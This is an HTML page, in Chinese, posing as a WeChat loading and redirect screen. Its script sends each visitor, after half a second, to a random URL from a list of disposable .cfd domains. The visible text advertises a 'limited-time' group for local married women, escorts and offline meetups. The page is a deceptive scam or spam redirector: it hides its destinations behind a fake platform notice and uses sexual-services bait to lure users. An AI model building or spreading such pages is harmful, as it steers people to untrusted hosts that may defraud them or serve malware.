<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      p {
        font-size: 35px;
        text-align: center;
        color: darkgreen;
        margin: 1em 0;
      }
      .highlight {
        color: coral;
      }

      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://wdftnw8dd8e.zopjapm.cfd/Rvvz2tN3",
          "http://wdftnw8dd8e.zopjapm.cfd/Rvvz2tN3",
          "http://pwnkk56b4xh.lizyxr.cfd/7oKKwtSR",
          "http://pwnkk56b4xh.lizyxr.cfd/7oKKwtSR",
          "http://63rad3wmzr6.jctnod.cfd/vKaDs8EW",
          "http://63rad3wmzr6.jctnod.cfd/vKaDs8EW",
          "http://ib3b6rnsnpi.nrvxes.cfd/r1bXWn9t",
          "http://ib3b6rnsnpi.nrvxes.cfd/r1bXWn9t",
          "http://b6m5wda7mb8.tsetwlc.cfd/3jWv5UiK",
          "http://b6m5wda7mb8.tsetwlc.cfd/3jWv5UiK",
          "http://7mkz8x3byb2.evwtlb.cfd/D62dwc07",
          "http://4rdneh664dw.6o1m50.cfd/d0odpMru",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 500);
      };
    </script>
  </head>
  <body>
    <p>
      微信正在跳转，请稍等，不要退出哦！<br />
      <span class="highlight">“如遇跳转失败请返回重新扫码”</span>
    </p>
    <p>
      全国各地同城 少妇，外围，线下互动 内部交流群<br />
      <span class="highlight">“限时加入！”</span>
    </p>
    <div class="image-container">
      <img src="img2/1.jpg" alt="Image 1" />
      <img src="img2/2.jpg" alt="Image 2" />
      <img src="img2/3.jpg" alt="Image 3" />
    </div>
  </body>
</html>
